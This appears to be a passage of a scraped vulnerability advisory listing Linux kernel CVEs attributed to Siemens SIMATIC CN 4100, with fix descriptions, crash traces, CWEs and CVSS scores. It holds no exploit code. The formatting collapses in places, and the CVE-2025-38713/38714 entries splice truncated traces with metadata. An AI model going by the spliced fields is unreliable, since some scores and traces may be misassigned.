In case of an ib_fast_reg_mr allocation failure during iSER setup, the machine hits a panic because iscsi_conn->dd_data is initialized unconditionally, even when no memory is allocated (dd_size == 0). This leads to an invalid pointer dereference during connection teardown. Fix by setting iscsi_conn->dd_data only if memory is actually allocated.

Panic trace:
------------
    iser: iser_create_fastreg_desc: Failed to allocate ib_fast_reg_mr err=-12
    iser: iser_alloc_rx_descriptors: failed allocating rx descriptors / data buffers
    BUG: unable to handle page fault for address: fffffffffffffff8
    RIP: 0010:swake_up_locked.part.5+0xa/0x40
    Call Trace:
    complete+0x31/0x40
    iscsi_iser_conn_stop+0x88/0xb0 [ib_iser]
    iscsi_stop_conn+0x66/0xc0 [scsi_transport_iscsi]
    iscsi_if_stop_conn+0x14a/0x150 [scsi_transport_iscsi]
    iscsi_if_rx+0x1135/0x1834 [scsi_transport_iscsi]
    ? netlink_lookup+0x12f/0x1b0
    ? netlink_deliver_tap+0x2c/0x200
    netlink_unicast+0x1ab/0x280
    netlink_sendmsg+0x257/0x4f0
    ? _copy_from_user+0x29/0x60
    sock_sendmsg+0x5f/0x70

Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 7 (HIGH), vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38701
In the Linux kernel, the following vulnerability has been resolved:

ext4: do not BUG when INLINE_DATA_FL lacks system.data xattr

A syzbot fuzzed image triggered a BUG_ON in ext4_update_inline_data() when an inode had the INLINE_DATA_FL flag set but was missing the system.data extended attribute. Since this can happen due to a maliciously fuzzed file system, we shouldn't BUG, but rather report it as a corrupted file system. Add similar replacements of BUG_ON with EXT4_ERROR_INODE() in ext4_create_inline_data() and ext4_inline_data_truncate().
Relevant CWE: CWE-617 Reachable Assertion
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38702
In the Linux kernel, the following vulnerability has been resolved:

fbdev: fix potential buffer overflow in do_register_framebuffer()

The current implementation may lead to a buffer overflow when:
1. Unregistration creates NULL gaps in registered_fb[]
2. All array slots become occupied despite num_registered_fb < FB_MAX
3. The registration loop exceeds array bounds

Add a boundary check to prevent registered_fb[FB_MAX] access.

Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1 base score 7.8 (HIGH), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38706
In the Linux kernel, the following vulnerability has been resolved:

ASoC: core: Check for rtd == NULL in snd_soc_remove_pcm_runtime()

snd_soc_remove_pcm_runtime() might be called with rtd == NULL, which will lead to a null pointer dereference. This was reproduced with topology loading and marking a link as ignore due to a missing hardware component on the system. On module removal the soc_tplg_remove_link() would call snd_soc_remove_pcm_runtime() with rtd == NULL since the link was ignored and no runtime was created.
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38707
In the Linux kernel, the following vulnerability has been resolved:

fs/ntfs3: Add sanity check for file name

The length of the file name should be smaller than the directory entry size.

Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38708
In the Linux kernel, the following vulnerability has been resolved:

drbd: add missing kref_get in handle_write_conflicts

With `two-primaries` enabled, DRBD tries to detect "concurrent" writes and handle write conflicts, so that even if you write to the same sector simultaneously on both nodes, they end up with the identical data once the writes are completed. In handling "superseded" writes, we forgot a kref_get, resulting in a premature drbd_destroy_device and use after free, and further to kernel crashes with symptoms.

Relevance: No one should use DRBD as a random data generator, and apparently all users of "two-primaries" handle concurrent writes correctly on the layer up. That is, cluster file systems use some distributed lock manager, and live migration in virtualization environments stops writes on one node before starting writes on the other node. Which means that other than for "test cases", this code path is never taken in real life.

FYI, in DRBD 9, things are handled differently nowadays. We still detect "write conflicts", but no longer try to be smart about them. We decided to disconnect hard instead: upper layers must not submit concurrent writes. If they do, that's their fault.

Relevant CWE: CWE-416 Use After Free
Metrics: CVSS 3.1 base score 7.8 (HIGH), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38711
In the Linux kernel, the following vulnerability has been resolved:

smb/server: avoid deadlock when linking with ReplaceIfExists

If smb2_create_link() is called with ReplaceIfExists set and the name does exist, then a deadlock will happen. ksmbd_vfs_kern_path_locked() will return with success and the parent directory will be locked. ksmbd_vfs_remove_file() will then remove the file. ksmbd_vfs_link() will then be called while the parent is still locked. It will try to lock the same parent and will deadlock.

This patch moves the ksmbd_vfs_kern_path_unlock() call to *before* ksmbd_vfs_link() and then simplifies the code, removing the file_present flag variable.
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38712 In the Linux kernel, the following vulnerability has been resolved: hfsplus: don't use BUG_ON() in hfsplus_create_attributes_file() When the volume header contains erroneous values that do not reflect the actual state of the filesystem, hfsplus_fill_super() assumes that the attributes file is not yet created, which later results in hitting BUG_ON() when hfsplus_create_attributes_file() is called. Replace this BUG_ON() with -EIO error with a message to suggest running fsck tool. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38713 In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix slab-out-of-bounds read in hfsplus_uni2asc() The hfsplus_readdir() method is capable to crash by calling hfsplus_uni2asc(): [ 667.121659][ T9805] ================================================================== [ 667.122651][ T9805] BUG: KASAN: slab-out-of-bounds in hfsplus_uni2asc+0x902/0xa10 [ 667.123627][ T9805] Read of size 2 at addr ffff88802592f40c by task repro/9805 [ 667.124578][ T9805] [ 667.124876][ T9805] CPU: 3 UID: 0 PID: 9805 Comm: repro Not tainted 6.16.0-rc3 #1 PREEMPT(full) [ 667.124886][ T9805] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 
Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation: Vendor fix. Update to V5.0 or later version: https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: 7 HIGH (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

CVE-2025-38714
In the Linux kernel, the following vulnerability has been resolved:

hfsplus: fix slab-out-of-bounds in hfsplus_bnode_read()

The hfsplus_bnode_read() method can trigger the issue:

    BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_read+0x2f4/0x360
    Read of size 8 at addr ffff88810b5fc6c0 by task repro/9784
__hfs_bnode_create+0x107/0x890 [ 174.881779][ T9784] hfsplus_bnode_find+0x2d0/0xd10 [ 174.882222][ T9784] hfsplus_brec_find+0x2b0/0x520 [ 174.882659][ T9784] hfsplus_delete_all_attrs+0x23b/0x3 ---truncated--- View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38715 In the Linux kernel, the following vulnerability has been resolved: hfs: fix slab-out-of-bounds in hfs_bnode_read() This patch introduces is_bnode_offset_valid() method that checks the requested offset value. Also, it introduces check_and_correct_requested_length() method that checks and correct the requested length (if it is necessary). These methods are used in hfs_bnode_read(), hfs_bnode_write(), hfs_bnode_clear(), hfs_bnode_copy(), and hfs_bnode_move() with the goal to prevent the access out of allocated memory and triggering the crash. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38721 In the Linux kernel, the following vulnerability has been resolved: netfilter: ctnetlink: fix refcount leak on table dump There is a reference count leak in ctnetlink_dump_table(): if (res < 0) { nf_conntrack_get(&ct->ct_general); // HERE cb->args[1] = (unsigned long)ct; ... While its very unlikely, its possible that ct == last. 
If this happens, then the refcount of ct was already incremented. This 2nd increment is never undone. This prevents the conntrack object from being released, which in turn keeps prevents cnet->count from dropping back to 0. This will then block the netns dismantle (or conntrack rmmod) as nf_conntrack_cleanup_net_list() will wait forever. This can be reproduced by running conntrack_resize.sh selftest in a loop. It takes ~20 minutes for me on a preemptible kernel on average before I see a runaway kworker spinning in nf_conntrack_cleanup_net_list. One fix would to change this to: if (res < 0) { if (ct != last) nf_conntrack_get(&ct->ct_general); But this reference counting isn't needed in the first place. We can just store a cookie value instead. A followup patch will do the same for ctnetlink_exp_dump_table, it looks to me as if this has the same problem and like ctnetlink_dump_table, we only need a 'skip hint', not the actual object so we can apply the same cookie strategy there as well. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-772 Missing Release of Resource after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38723 In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Fix jump offset calculation in tailcall The extra pass of bpf_int_jit_compile() skips JIT context initialization which essentially skips offset calculation leaving out_offset = -1, so the jmp_offset in emit_bpf_tail_call is calculated by "#define jmp_offset (out_offset - (cur_offset))" is a negative number, which is wrong. The final generated assembly are as follow. 
54: bgeu $a2, $t1, -8 # 0x0000004c 58: addi.d $a6, $s5, -1 5c: bltz $a6, -16 # 0x0000004c 60: alsl.d $t2, $a2, $a1, 0x3 64: ld.d $t2, $t2, 264 68: beq $t2, $zero, -28 # 0x0000004c Before apply this patch, the follow test case will reveal soft lock issues. cd tools/testing/selftests/bpf/ ./test_progs --allow=tailcalls/tailcall_bpf2bpf_1 dmesg: watchdog: BUG: soft lockup - CPU#2 stuck for 26s! [test_progs:25056] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38724 In the Linux kernel, the following vulnerability has been resolved: nfsd: handle get_client_locked() failure in nfsd4_setclientid_confirm() Lei Lu recently reported that nfsd4_setclientid_confirm() did not check the return value from get_client_locked(). a SETCLIENTID_CONFIRM could race with a confirmed client expiring and fail to get a reference. That could later lead to a UAF. Fix this by getting a reference early in the case where there is an extant confirmed client. If that fails then treat it as if there were no confirmed client found at all. In the case where the unconfirmed client is expiring, just fail and return the result from get_client_locked(). 
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38725 In the Linux kernel, the following vulnerability has been resolved: net: usb: asix_devices: add phy_mask for ax88772 mdio bus Without setting phy_mask for ax88772 mdio bus, current driver may create at most 32 mdio phy devices with phy address range from 0x00 ~ 0x1f. DLink DUB-E100 H/W Ver B1 is such a device. However, only one main phy device will bind to net phy driver. This is creating issue during system suspend/resume since phy_polling_mode() in phy_state_machine() will directly deference member of phydev->drv for non-main phy devices. Then NULL pointer dereference issue will occur. Due to only external phy or internal phy is necessary, add phy_mask for ax88772 mdio bus to workarnoud the issue. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2025-38727 In the Linux kernel, the following vulnerability has been resolved: netlink: avoid infinite retry looping in netlink_unicast() netlink_attachskb() checks for the socket's read memory allocation constraints. Firstly, it has: rmem < READ_ONCE(sk->sk_rcvbuf) to check if the just increased rmem value fits into the socket's receive buffer. 
If not, it proceeds and tries to wait for the memory under: rmem + skb->truesize > READ_ONCE(sk->sk_rcvbuf) The checks don't cover the case when skb->truesize + sk->sk_rmem_alloc is equal to sk->sk_rcvbuf. Thus the function neither successfully accepts these conditions, nor manages to reschedule the task - and is called in retry loop for indefinite time which is caught as: rcu: INFO: rcu_sched self-detected stall on CPU rcu: 0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212 (t=26000 jiffies g=230833 q=259957) NMI backtrace for cpu 0 CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014 Call Trace: dump_stack lib/dump_stack.c:120 nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105 nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62 rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335 rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590 update_process_times kernel/time/timer.c:1953 tick_sched_handle kernel/time/tick-sched.c:227 tick_sched_timer kernel/time/tick-sched.c:1399 __hrtimer_run_queues kernel/time/hrtimer.c:1652 hrtimer_interrupt kernel/time/hrtimer.c:1717 __sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113 asm_call_irq_on_stack arch/x86/entry/entry_64.S:808 netlink_attachskb net/netlink/af_netlink.c:1234 netlink_unicast net/netlink/af_netlink.c:1349 kauditd_send_queue kernel/audit.c:776 kauditd_thread kernel/audit.c:897 kthread kernel/kthread.c:328 ret_from_fork arch/x86/entry/entry_64.S:304 Restore the original behavior of the check which commit in Fixes accidentally missed when restructuring the code. Found by Linux Verification Center (linuxtesting.org). 
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38728 In the Linux kernel, the following vulnerability has been resolved: smb3: fix for slab out of bounds on mount to ksmbd With KASAN enabled, it is possible to get a slab out of bounds during mount to ksmbd due to missing check in parse_server_interfaces() (see below): BUG: KASAN: slab-out-of-bounds in parse_server_interfaces+0x14ee/0x1880 [cifs] Read of size 4 at addr ffff8881433dba98 by task mount/9827 CPU: 5 UID: 0 PID: 9827 Comm: mount Tainted: G OE 6.16.0-rc2-kasan #2 PREEMPT(voluntary) Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: Dell Inc. Precision Tower 3620/0MWYPT, BIOS 2.13.1 06/14/2019 Call Trace: dump_stack_lvl+0x9f/0xf0 print_report+0xd1/0x670 __virt_addr_valid+0x22c/0x430 ? parse_server_interfaces+0x14ee/0x1880 [cifs] ? kasan_complete_mode_report_info+0x2a/0x1f0 ? parse_server_interfaces+0x14ee/0x1880 [cifs] kasan_report+0xd6/0x110 parse_server_interfaces+0x14ee/0x1880 [cifs] __asan_report_load_n_noabort+0x13/0x20 parse_server_interfaces+0x14ee/0x1880 [cifs] ? __pfx_parse_server_interfaces+0x10/0x10 [cifs] ? trace_hardirqs_on+0x51/0x60 SMB3_request_interfaces+0x1ad/0x3f0 [cifs] ? __pfx_SMB3_request_interfaces+0x10/0x10 [cifs] ? SMB2_tcon+0x23c/0x15d0 [cifs] smb3_qfs_tcon+0x173/0x2b0 [cifs] ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs] ? cifs_get_tcon+0x105d/0x2120 [cifs] ? do_raw_spin_unlock+0x5d/0x200 ? cifs_get_tcon+0x105d/0x2120 [cifs] ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs] cifs_mount_get_tcon+0x369/0xb90 [cifs] ? dfs_cache_find+0xe7/0x150 [cifs] dfs_mount_share+0x985/0x2970 [cifs] ? 
check_path.constprop.0+0x28/0x50 ? save_trace+0x54/0x370 ? __pfx_dfs_mount_share+0x10/0x10 [cifs] ? __lock_acquire+0xb82/0x2ba0 ? __kasan_check_write+0x18/0x20 cifs_mount+0xbc/0x9e0 [cifs] ? __pfx_cifs_mount+0x10/0x10 [cifs] ? do_raw_spin_unlock+0x5d/0x200 ? cifs_setup_cifs_sb+0x29d/0x810 [cifs] cifs_smb3_do_mount+0x263/0x1990 [cifs] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38729 In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Validate UAC3 power domain descriptors, too UAC3 power domain descriptors need to be verified with its variable bLength for avoiding the unexpected OOB accesses by malicious firmware, too. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-38732 In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_reject: don't leak dst refcount for loopback packets recent patches to add a WARN() when replacing skb dst entry found an old bug: WARNING: include/linux/skbuff.h:1165 skb_dst_check_unset include/linux/skbuff.h:1164 [inline] WARNING: include/linux/skbuff.h:1165 skb_dst_set include/linux/skbuff.h:1210 [inline] WARNING: include/linux/skbuff.h:1165 nf_reject_fill_skb_dst+0x2a4/0x330 net/ipv4/netfilter/nf_reject_ipv4.c:234 [..] 
Call Trace: nf_send_unreach+0x17b/0x6e0 net/ipv4/netfilter/nf_reject_ipv4.c:325 nft_reject_inet_eval+0x4bc/0x690 net/netfilter/nft_reject_inet.c:27 expr_call_ops_eval net/netfilter/nf_tables_core.c:237 [inline] .. This is because blamed commit forgot about loopback packets. Such packets already have a dst_entry attached, even at PRE_ROUTING stage. Instead of checking hook just check if the skb already has a route attached to it. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-911 Improper Update of Reference Count Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.8 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H CVE-2025-38735 In the Linux kernel, the following vulnerability has been resolved: gve: prevent ethtool ops after shutdown A crash can occur if an ethtool operation is invoked after shutdown() is called. shutdown() is invoked during system shutdown to stop DMA operations without performing expensive deallocations. It is discouraged to unregister the netdev in this path, so the device may still be visible to userspace and kernel helpers. In gve, shutdown() tears down most internal data structures. If an ethtool operation is dispatched after shutdown(), it will dereference freed or NULL pointers, leading to a kernel panic. While graceful shutdown normally quiesces userspace before invoking the reboot syscall, forced shutdowns (as observed on GCP VMs) can still trigger this path. Fix by calling netif_device_detach() in shutdown(). This marks the device as detached so the ethtool ioctl handler will skip dispatching operations to the driver. 
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-664 Improper Control of a Resource Through its Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38736 In the Linux kernel, the following vulnerability has been resolved: net: usb: asix_devices: Fix PHY address mask in MDIO bus initialization Syzbot reported shift-out-of-bounds exception on MDIO bus initialization. The PHY address should be masked to 5 bits (0-31). Without this mask, invalid PHY addresses could be used, potentially causing issues with MDIO bus operations. Fix this by masking the PHY address with 0x1f (31 decimal) to ensure it stays within the valid range. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39673 In the Linux kernel, the following vulnerability has been resolved: ppp: fix race conditions in ppp_fill_forward_path ppp_fill_forward_path() has two race conditions: 1. The ppp->channels list can change between list_empty() and list_first_entry(), as ppp_lock() is not held. If the only channel is deleted in ppp_disconnect_channel(), list_first_entry() may access an empty head or a freed entry, and trigger a panic. 2. pch->chan can be NULL. When ppp_unregister_channel() is called, pch->chan is set to NULL before pch is removed from ppp->channels. 
Fix these by using a lockless RCU approach: - Use list_first_or_null_rcu() to safely test and access the first list entry. - Convert list modifications on ppp->channels to their RCU variants and add synchronize_net() after removal. - Check for a NULL pch->chan before dereferencing it. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-39675 In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Add null pointer check in mod_hdcp_hdcp1_create_session() The function mod_hdcp_hdcp1_create_session() calls the function get_first_active_display(), but does not check its return value. The return value is a null pointer if the display list is empty. This will lead to a null pointer dereference. Add a null pointer check for get_first_active_display() and return MOD_HDCP_STATUS_DISPLAY_NOT_FOUND if the function return null. This is similar to the commit c3e9826a2202 ("drm/amd/display: Add null pointer check for get_first_active_display()"). 
(cherry picked from commit 5e43eb3cd731649c4f8b9134f857be62a416c893) View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39676 In the Linux kernel, the following vulnerability has been resolved: scsi: qla4xxx: Prevent a potential error pointer dereference The qla4xxx_get_ep_fwdb() function is supposed to return NULL on error, but qla4xxx_ep_connect() returns error pointers. Propagating the error pointers will lead to an Oops in the caller, so change the error pointers to NULL. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-394 Unexpected Status Code or Return Value Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.1 MEDIUM CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2025-39681 In the Linux kernel, the following vulnerability has been resolved: x86/cpu/hygon: Add missing resctrl_cpu_detect() in bsp_init helper Since 923f3a2b48bd ("x86/resctrl: Query LLC monitoring properties once during boot") resctrl_cpu_detect() has been moved from common CPU initialization code to the vendor-specific BSP init helper, while Hygon didn't put that call in their code. This triggers a division by zero fault during early booting stage on our machines with X86_FEATURE_CQM* supported, where get_rdt_mon_resources() tries to calculate mon_l3_config with uninitialized boot_cpu_data.x86_cache_occ_scale. Add the missing resctrl_cpu_detect() in the Hygon BSP init helper. 
[ bp: Massage commit message. ] View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-369 Divide By Zero Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-39682 In the Linux kernel, the following vulnerability has been resolved: tls: fix handling of zero-length records on the rx_list Each recvmsg() call must process either - only contiguous DATA records (any number of them) - one non-DATA record If the next record has different type than what has already been processed we break out of the main processing loop. If the record has already been decrypted (which may be the case for TLS 1.3 where we don't know type until decryption) we queue the pending record to the rx_list. Next recvmsg() will pick it up from there. Queuing the skb to rx_list after zero-copy decrypt is not possible, since in that case we decrypted directly to the user space buffer, and we don't have an skb to queue (darg.skb points to the ciphertext skb for access to metadata like length). Only data records are allowed zero-copy, and we break the processing loop after each non-data record. So we should never zero-copy and then find out that the record type has changed. The corner case we missed is when the initial record comes from rx_list, and it's zero length. 
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2025-39683 In the Linux kernel, the following vulnerability has been resolved: tracing: Limit access to parser->buffer when trace_get_user failed When the length of the string written to set_ftrace_filter exceeds FTRACE_BUFF_MAX, the following KASAN alarm will be triggered: BUG: KASAN: slab-out-of-bounds in strsep+0x18c/0x1b0 Read of size 1 at addr ffff0000d00bd5ba by task ash/165 CPU: 1 UID: 0 PID: 165 Comm: ash Not tainted 6.16.0-g6bcdbd62bd56-dirty Hardware name: linux,dummy-virt (DT) Call trace: show_stack+0x34/0x50 (C) dump_stack_lvl+0xa0/0x158 print_address_description.constprop.0+0x88/0x398 print_report+0xb0/0x280 kasan_report+0xa4/0xf0 __asan_report_load1_noabort+0x20/0x30 strsep+0x18c/0x1b0 ftrace_process_regex.isra.0+0x100/0x2d8 ftrace_regex_release+0x484/0x618 __fput+0x364/0xa58 ____fput+0x28/0x40 task_work_run+0x154/0x278 do_notify_resume+0x1f0/0x220 el0_svc+0xec/0xf0 el0t_64_sync_handler+0xa0/0xe8 el0t_64_sync+0x1ac/0x1b0 The reason is that trace_get_user will fail when processing a string longer than FTRACE_BUFF_MAX, but not set the end of parser->buffer to 0. Then an OOB access will be triggered in ftrace_regex_release-> ftrace_process_regex->strsep->strpbrk. We can solve this problem by limiting access to parser->buffer when trace_get_user failed. 
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H CVE-2025-39684 In the Linux kernel, the following vulnerability has been resolved: comedi: Fix use of uninitialized memory in do_insn_ioctl() and do_insnlist_ioctl() syzbot reports a KMSAN kernel-infoleak in `do_insn_ioctl()`. A kernel buffer is allocated to hold `insn->n` samples (each of which is an `unsigned int`). For some instruction types, `insn->n` samples are copied back to user-space, unless an error code is being returned. The problem is that not all the instruction handlers that need to return data to userspace fill in the whole `insn->n` samples, so that there is an information leak. There is a similar syzbot report for `do_insnlist_ioctl()`, although it does not have a reproducer for it at the time of writing. One culprit is `insn_rw_emulate_bits()` which is used as the handler for `INSN_READ` or `INSN_WRITE` instructions for subdevices that do not have a specific handler for that instruction, but do have an `INSN_BITS` handler. For 